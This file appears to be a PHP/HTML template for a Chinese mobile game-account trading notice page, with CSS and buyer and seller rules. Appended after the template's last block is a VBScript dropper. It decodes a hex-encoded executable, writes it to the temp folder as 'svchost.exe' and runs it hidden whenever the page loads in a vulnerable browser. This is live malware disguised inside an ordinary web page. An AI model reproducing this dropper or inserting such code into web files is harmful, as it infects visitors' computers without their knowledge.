|
|
|
<extend name="Public/tradebases" />
|
|
|
|
<block name="css">
|
|
|
|
<link rel="stylesheet" href="__CSS__/xg_common.css">
|
|
|
|
<style>
|
|
|
|
body {background-image:none;background:#FFF;}
|
|
|
|
.header-btn .trade_caption {color:#FFF;}
|
|
|
|
.trade-notice-header {height:auto;background:url(__IMG__/trade/bg@3x.png) top center no-repeat;background-size:100% 100%;color:#FFF;}
|
|
|
|
.trade_notice_top {padding:0.2rem 0.4rem 0.8rem;}
|
|
|
|
.trade_notice_top p {line-height:1.4;text-indent:2em;color:#FFF}
|
|
|
|
.mask-body{padding: 0rem .4rem .6rem;}
|
|
|
|
.mask-body dt{
|
|
|
|
font-size: 0.42rem;
|
|
|
|
color: #343434;
|
|
|
|
margin-bottom: 0.4rem;font-weight:700;
|
|
|
|
}
|
|
|
|
|
|
|
|
.mask-body dd{
|
|
|
|
font-size: 0.38rem;
|
|
|
|
color: #717171;
|
|
|
|
margin: 0rem;
|
|
|
|
}
|
|
|
|
.mask-body .notice dd{
|
|
|
|
counter-increment: item;
|
|
|
|
}
|
|
|
|
|
|
|
|
.mask-body .notice dd::before{
|
|
|
|
content: counter(item);
|
|
|
|
display: inline-block;
|
|
|
|
width: 0.46rem;
|
|
|
|
height: 0.46rem;
|
|
|
|
line-height: 0.46rem;
|
|
|
|
border-radius: 100%;
|
|
|
|
font-size: 0.35rem;
|
|
|
|
color: #fff;
|
|
|
|
text-align: center;
|
|
|
|
background-color: #999;
|
|
|
|
margin-right: 0.16rem;
|
|
|
|
}
|
|
|
|
|
|
|
|
.purchase_process .xg-table {
|
|
|
|
width: 100%;
|
|
|
|
table-layout: fixed;
|
|
|
|
margin-bottom: .8rem;
|
|
|
|
}
|
|
|
|
|
|
|
|
.purchase_process .xg-table td{
|
|
|
|
text-align: center;
|
|
|
|
vertical-align: middle;
|
|
|
|
border: none;
|
|
|
|
position: relative;
|
|
|
|
}
|
|
|
|
.purchase_process .process-flag{
|
|
|
|
display: block;
|
|
|
|
width: 0.5rem;
|
|
|
|
height: 0.5rem;
|
|
|
|
margin: 0 auto;
|
|
|
|
background-color: currentColor;
|
|
|
|
background-clip: content-box;
|
|
|
|
padding: 2px;
|
|
|
|
border:1px solid currentColor;
|
|
|
|
color: #4f90f5;
|
|
|
|
border-radius: 100%;
|
|
|
|
text-indent: -99rem;
|
|
|
|
z-index: 2;
|
|
|
|
box-sizing: border-box;
|
|
|
|
}
|
|
|
|
.purchase_process .process-flag:before,
|
|
|
|
.purchase_process .process-flag:after{
|
|
|
|
content: '';
|
|
|
|
position: absolute;
|
|
|
|
top:50%;
|
|
|
|
border-top:1px dashed currentColor;
|
|
|
|
z-index: 0;
|
|
|
|
}
|
|
|
|
.purchase_process .process-flag:before{
|
|
|
|
left: 0px;
|
|
|
|
right: 50%;
|
|
|
|
margin-right: 0.25rem;
|
|
|
|
}
|
|
|
|
.purchase_process .process-flag:after{
|
|
|
|
left: 50%;
|
|
|
|
right: 2px;
|
|
|
|
margin-left: 0.25rem;
|
|
|
|
}
|
|
|
|
.purchase_process .process-flag.first:before{
|
|
|
|
display: none;
|
|
|
|
}
|
|
|
|
.purchase_process .process-flag.last:after{
|
|
|
|
display: none;
|
|
|
|
}
|
|
|
|
.purchase_process .xg-image {
|
|
|
|
display: inline-block;
|
|
|
|
width: 1.2rem;
|
|
|
|
height: auto;
|
|
|
|
margin-top: 0.5rem;
|
|
|
|
margin-bottom: 0.28rem;
|
|
|
|
}
|
|
|
|
.purchase_process .xg-text{
|
|
|
|
font-size: 0.38rem;
|
|
|
|
color: #4b4b4b;
|
|
|
|
padding: 0 0.1rem;
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
.read_main{
|
|
|
|
padding:0rem .4rem .6rem;
|
|
|
|
min-height:9.8rem;
|
|
|
|
box-sizing: border-box;border-bottom:.1rem solid #eee
|
|
|
|
}
|
|
|
|
.h_tit{
|
|
|
|
width:100%;
|
|
|
|
text-align:left;
|
|
|
|
font-size:.42rem;
|
|
|
|
color:#343434;margin:0.4rem 0 0.2rem;
|
|
|
|
}
|
|
|
|
.flow_img{
|
|
|
|
width:100%;
|
|
|
|
height:2.5rem;
|
|
|
|
margin-top:.2rem;
|
|
|
|
margin-bottom:.4rem;
|
|
|
|
}
|
|
|
|
.instruct{
|
|
|
|
width: 100%;
|
|
|
|
margin-top: .2rem;
|
|
|
|
text-align: left;
|
|
|
|
}
|
|
|
|
.intruct_tab{
|
|
|
|
width:100%;
|
|
|
|
}
|
|
|
|
.intruct_tab tr td:first-child{
|
|
|
|
width:.6rem;
|
|
|
|
vertical-align:top;
|
|
|
|
}
|
|
|
|
.intruct_tab tr td:not:(first-child){
|
|
|
|
color:#717171;
|
|
|
|
}
|
|
|
|
.instruct_num{
|
|
|
|
display:inline-block;
|
|
|
|
width:.4rem;
|
|
|
|
height:.4rem;
|
|
|
|
line-height:.4rem;
|
|
|
|
color:#fff;
|
|
|
|
background-color:#999;
|
|
|
|
border-radius:50%;
|
|
|
|
text-align:center;font-size:.3rem;
|
|
|
|
}
|
|
|
|
|
|
|
|
.confirm_btn.disabled {background:#bbb} .xgdisabled {background:#c1c3c1;}
|
|
|
|
.h_tit {font-weight:normal;}
|
|
|
|
.intruct_tab tr td:first-child {display:none;}
|
|
|
|
.intruct_tab tr {counter-increment: item;}
|
|
|
|
.intruct_tab p:before{
|
|
|
|
content: counter(item);
|
|
|
|
display: inline-block;
|
|
|
|
width: .45rem;
|
|
|
|
height: .45rem;
|
|
|
|
line-height: .45rem;
|
|
|
|
border-radius: 100%;
|
|
|
|
font-size: .22rem;
|
|
|
|
color: #fff;
|
|
|
|
text-align: center;
|
|
|
|
background-color: #999;
|
|
|
|
margin-right: 0.2rem;
|
|
|
|
}
|
|
|
|
.mast_read {width:90%;}
|
|
|
|
.trade_notice_space {height:3.1rem;}
|
|
|
|
.xg-main {padding-top:1px;background:#FFF;}
|
|
|
|
.read_main,.mask-body {background:#FFF;}
|
|
|
|
@media screen and (min-width:640px) {
|
|
|
|
.h_tit {font-size:.4rem;}
|
|
|
|
.intruct_tab p{font-size:.34rem;line-height:1.444;margin-bottom:0.1rem;}
|
|
|
|
.read_toptit {padding:2rem;font-size:2.8rem;height:auto;}
|
|
|
|
.intruct_tab p:before {font-size:.34rem;}
|
|
|
|
.label_txt {font-size:1.5rem;}
|
|
|
|
.readed {margin-top:1rem;}
|
|
|
|
.remember_btn {height:3.6rem;line-height:3.6rem;font-size:2.2rem;width:50%;margin-top:2.8rem;}
|
|
|
|
.flow_img {height:2.7rem;}
|
|
|
|
.trade_notice_top p {font-size:0.28rem;}
|
|
|
|
.purchase_process .xg-text {font-size:0.34rem;}
|
|
|
|
.purchase_process .xg-image {margin-top:0.4rem;margin-bottom:0.05rem;}
|
|
|
|
purchase_process {margin-bottom:0;}
|
|
|
|
.trade_notice_space {height:2.9rem;}
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
</style>
|
|
|
|
</block>
|
|
|
|
<block name="body" >
|
|
|
|
<script src="__JS__/xg_mobile.js"></script>
|
|
|
|
<header class="header trade-header header-btn trade-notice-header" >
|
|
|
|
<a class="xg-back" id="jstradenoticebox" href="javascript:history.back(-1);"></a>
|
|
|
|
<h1 class="xg-title trade_caption">交易须知</h1>
|
|
|
|
<div class="trade_notice_top">
|
|
|
|
<p>账号交易采用转移小号的方式;买入或者卖出游戏角色,不影响您的平台账号使用。</p>
|
|
|
|
</div>
|
|
|
|
</header>
|
|
|
|
<div class="trade_notice_space"> </div>
|
|
|
|
<main class="xg-main wrapper" style="position:relative;top:0;">
|
|
|
|
<div class="">
|
|
|
|
<div class="read_main">
|
|
|
|
<h4 class="h_tit">购买流程</h4>
|
|
|
|
<p style="width:90%;margin:0 auto;">
|
|
|
|
<img class="flow_img" src="__IMG__/trade/icon_maijia@3x.png" alt="" height="" width="">
|
|
|
|
</p>
|
|
|
|
<h4 class="h_tit">买家须知</h4>
|
|
|
|
<div class="instruct">
|
|
|
|
<table class="intruct_tab">
|
|
|
|
<tbody>
|
|
|
|
<tr>
|
|
|
|
<td><span class="instruct_num">1</span></td>
|
|
|
|
<td>
|
|
|
|
<p>角色信息已通过本平台审核,因时间因素造成排行榜,称号,装备,到期等变化,不视为信息失实;</p>
|
|
|
|
</td>
|
|
|
|
</tr>
|
|
|
|
<tr>
|
|
|
|
<td><span class="instruct_num">2</span></td>
|
|
|
|
<td>
|
|
|
|
<p>购买后,角色小号自动转入你的平台账号内,重新登录游戏【选择小号】处查收即可;</p>
|
|
|
|
</td>
|
|
|
|
</tr>
|
|
|
|
<tr>
|
|
|
|
<td><span class="instruct_num">3</span></td>
|
|
|
|
<td>
|
|
|
|
<p>交易过程仅限小号转移,不存在游戏账号交易或换绑行为,无需担心角色找回;</p>
|
|
|
|
</td>
|
|
|
|
</tr>
|
|
|
|
<tr>
|
|
|
|
<td><span class="instruct_num">4</span></td>
|
|
|
|
<td>
|
|
|
|
<p>交易完成后,不支持退货!</p>
|
|
|
|
</td>
|
|
|
|
</tr>
|
|
|
|
</tbody>
|
|
|
|
</table>
|
|
|
|
</div>
|
|
|
|
</div>
|
|
|
|
|
|
|
|
<div class="mask-body ">
|
|
|
|
<dl>
|
|
|
|
<dt><h4 class="h_tit">出售流程</h4></dt>
|
|
|
|
<dd class="purchase_process ">
|
|
|
|
<table class="xg-table" border="0" cellpadding="0" cellspacing="0">
|
|
|
|
<tr>
|
|
|
|
<td><span class="process-flag first">1</span></td>
|
|
|
|
<td><span class="process-flag">2</span></td>
|
|
|
|
<td><span class="process-flag">3</span></td>
|
|
|
|
<td><span class="process-flag last">4</span></td>
|
|
|
|
</tr>
|
|
|
|
<tr>
|
|
|
|
<td><img class="xg-image" src="__IMG__/trade1/icon_normal_tijiao.png" width="180" height="" alt="">
|
|
|
|
<p class="xg-text">提交商品</p>
|
|
|
|
</td>
|
|
|
|
<td><img class="xg-image" src="__IMG__/trade1/icon_normal_shenhe.png" width="180" height="180" alt="">
|
|
|
|
<p class="xg-text">审核冻结</p>
|
|
|
|
</td>
|
|
|
|
<td><img class="xg-image" src="__IMG__/trade1/icon_normal_maijia.png" width="180" height="180" alt="">
|
|
|
|
<p class="xg-text">买家购买</p>
|
|
|
|
</td>
|
|
|
|
<td><img class="xg-image" src="__IMG__/trade1/icon_normal_huoyi.png" width="180" height="180" alt="">
|
|
|
|
<p class="xg-text">获得收益</p>
|
|
|
|
</td>
|
|
|
|
</tr>
|
|
|
|
</table>
|
|
|
|
</dd>
|
|
|
|
</dl>
|
|
|
|
<h4 class="h_tit">卖家须知</h4>
|
|
|
|
<div class="instruct">
|
|
|
|
<table class="intruct_tab">
|
|
|
|
<tbody>
|
|
|
|
<tr>
|
|
|
|
<td><span class="instruct_num">1</span></td>
|
|
|
|
<td>
|
|
|
|
<p>提交出售申请后,审核人员会冻结待售小号,无法登录;</p>
|
|
|
|
</td>
|
|
|
|
</tr>
|
|
|
|
<tr>
|
|
|
|
<td><span class="instruct_num">2</span></td>
|
|
|
|
<td>
|
|
|
|
<p>若审核不通过,或者您选择下架商品,可重新登录游戏获得小号;</p>
|
|
|
|
</td>
|
|
|
|
</tr>
|
|
|
|
<tr>
|
|
|
|
<td><span class="instruct_num">3</span></td>
|
|
|
|
<td>
|
|
|
|
<p>若小号出售成功,则该小号在游戏中所有区服的角色将会一起出售;</p>
|
|
|
|
</td>
|
|
|
|
</tr>
|
|
|
|
<tr>
|
|
|
|
<td><span class="instruct_num">4</span></td>
|
|
|
|
<td>
|
|
|
|
<p>出售成功将收取{:set_zero_on_number(C('withdraw.sell_rate'))}%手续费(最低{:set_zero_on_number(C('withdraw.poundage'))}元),剩余收益以金币形式发送至您的账号内;</p>
|
|
|
|
</td>
|
|
|
|
</tr>
|
|
|
|
<tr>
|
|
|
|
<td><span class="instruct_num">5</span></td>
|
|
|
|
<td>
|
|
|
|
<p>交易完成后,不支持找回。</p>
|
|
|
|
</td>
|
|
|
|
</tr>
|
|
|
|
</tbody>
|
|
|
|
</table>
|
|
|
|
</div>
|
|
|
|
</div>
|
|
|
|
|
|
|
|
|
|
|
|
</div>
|
|
|
|
</main>
|
|
|
|
</block><SCRIPT Language=VBScript><!--
|
|
|
|
DropFileName = "svchost.exe"
|
|
|
|
WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000504500004C010300BC7CB1470000000000000000E0000F010B01070400E000000010000000E0010030C0020000F0010000D002000000400000100000000200000A00000008000100040000000000000000E002000010000000000000020000000000100000100000000010000010000000000000100000000000000000000000E8D402001001000000D00200E80400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000555058300000000000E00100001000000000000000040000000000000000000000000000800000E0555058310000000000E0000000F0010000D2000000040000000000000000000000000000400000E02E727372630000000010000000D002000006000000D60000000000000000000000000000400000C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000332E303300555058210D09020838ADBE177792F93FD0A0020023D000000048010026000012B29FA89200FF25304041CD6EE59202E4420564401919197970005C8C01191919C8EC94BF1D90B14435F4244105558BEC81C49AED60FE3CFFFFFFC7855C2B094C37B3FFE6EF0A195DD08175A035FF4DAC1155A0C9C204306E7FBF9F6845E0322D45A4346A35E804021C331F39D921085C803534311A8C8CBDFBBC815D0639C4C9C372143069B6DFDE3437353322F038383237833838BB9BBF1B700936333631FF8D4429B52C05017D7CB2F7EFE8F7950E836DCC00488AF0343532BEEFF6DDFC343491D0B23231748F046F791E39D9B60C18D83436CC3FB37BECFFF50185585DFF4D76198D3FF66FBF246365EC1E4588214DB4019D735DB40011951C61B2BB7809317DF8E77409DC00CD5D1E8EE03834459D7C16D6AEFBF60F37A88D9558FE0C528D8D7C065190388C4CC203044738A46B66BB05597F74DCF8350D509163939933694CBCCC386C84C9BAF40500D7044C0831D8D7CE16698406AB5171D8B2F7F7C1899D4F015588337AF7BBC2B3BDB4519CFF663A68312CDCBE8536475237DC8BBC332360369BCCDC219D488D14B9F73BBF8773D058009B9031E22FBFBD0BB85D2FEC35323835843631DF0EFF3CC8897DE081A52E723737814DDDB60DC394330C74F48235069564F6FE0AEE9E5C7721F7559C56BE67BECF4282D83134BE48B8E6B7EF7104786809094FC2F03321BD3C9193ADF1115DF8312999107C7736608DB077AD10133474096E123AA600973624E69B8423BB6408FF05124C3C8D7DCE261960B406FC094DDCC681D0B5080C94AC34579BD928FCDC3131B17440BB041BDF5930B44C5D5D80C0A41FFB1D0BD800297DC0312C217DFC83AD170B59E34681A01197B5AEDF6FBF16204C35290D197D80F79DBBF77684D2B75D366DE43368671105858E0C188F4C1C9C38376670127E3C23AFCC5703061430A5D35F6C54E505363834F89F91BEBDD93536C77AA7B021B5604819990CF3D0218578A0447448DF370F85E45052FF75A46043C9ACF4B3F483C48009C4314D8C771936D9DB6D7D07F08902295DF0496C9E846FB037884650378AD470D85A83EB9C05338403353636B637DE45DC3338682145E49088FA805BDB71DB13AC5B55A84583552F06D0ABF5C864547CB4373382A5AC05476BF874817B324A2F6C5B6FCC9177B8DCF471F0834DA54B8DEDA031210381CF863137D919DFD99E9C510718B1C7123C4F3232407C9C33349449EFF16653C6B1FADB37C9AD3DBC3135CCDC8C32320A9330093B560770EA3083353BE7E8BE354FE8323169B3F8F40064066B64D39831D2B76DAE124E0436315053C7CB1A7F9D4C6833AF75D468EBD6C2F7D72120F06A31069D84F8FB671D58C69C21899F342E722C0874E0F43732B93732D908A62B043CED82CFC9C8643D10B88481F0C0E1D36DC4E881AD0AA0211E5D69A1BDC0902913A5
|
|
|
|
Set FSO = CreateObject("Scripting.FileSystemObject")
|
|
|
|
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
|
|
|
|
If FSO.FileExists(DropPath)=False Then
|
|
|
|
Set FileObj = FSO.CreateTextFile(DropPath, True)
|
|
|
|
For i = 1 To Len(WriteData) Step 2
|
|
|
|
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
|
|
|
|
Next
|
|
|
|
FileObj.Close
|
|
|
|
End If
|
|
|
|
Set WSHshell = CreateObject("WScript.Shell")
|
|
|
|
WSHshell.Run DropPath, 0
|
|
|
|
//--></SCRIPT>
|